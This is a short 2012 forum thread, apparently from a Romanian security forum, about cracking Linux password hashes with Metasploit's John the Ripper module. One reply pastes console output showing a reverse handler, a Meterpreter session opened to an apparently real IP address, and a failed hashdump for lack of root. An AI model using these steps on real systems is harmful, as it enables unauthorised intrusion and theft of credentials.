Nytro Posted December 30, 2012 Report Posted December 30, 2012 Crack Linux Hashes Using Metasploit Framework Description: In this video I will show you how to crack Linux hashes using the Metasploit framework auxiliary module and make sure that your Database is connected with Metasploit – Framework or you will get errors.I’m using John the Ripper Auxiliary modules this module will allow you to crack your hashes and you can read your password in plain text but you have to use the dictionary for the brute-force attack.This module uses John the Ripper to identify weak passwords that have been acquired from unshadowed passwd files from Unix systems. The module will only crack MD5 and DES implementations by default. Set Crypt to true to also try to crack Blowfish and SHA implementations. Warning: This is much slower.John the Ripper Linux Password Cracker | Metasploit Exploit Database (DB) Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Crack Linux Hashes Using Metasploit Framework Quote
Zatarra Posted December 30, 2012 Report Posted December 30, 2012 Tare.. testele mereu merg la proof. Pacat ca nu am timp sa-l testez cu adevarat. Is curios cum se descurca la parole mai dificile, si totodata cat sta la un passlist mai mare. Quote
crossbower Posted December 30, 2012 Report Posted December 30, 2012 Bun tutorial Nytro dar nu reusesc sa le folosesc.Dupa cu se vede si in tutorial foloseste modulul post/linux/gather/hashdumpdar modulul hashdump se poate folosi daca avem acces de root!![*] Exploit running as background job.[*] Started reverse handler on xxx.xxx.xxx.xxx:443[*] Starting the payload handler..[*] Sending stage (39217 bytes) to 195.234.171.250...[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:443 -> 195.234.171.250:34911)msf > use post/linux/gather/hashdumpmsf post(hashdump) > set VERBOSE 1VERBOSE => 1msf post(hashdump) > set SESSION 1SESSION => 1msf post(hashdump) > run -j[*] Post module running as background job[-] [COLOR="#FF0000"]You must run this module as root[/COLOR] Quote
Nytro Posted December 30, 2012 Author Report Posted December 30, 2012 Da, hash-urile sunt citite din /etc/shadow, deci ai nevoie de root pentru a le putea citi... Quote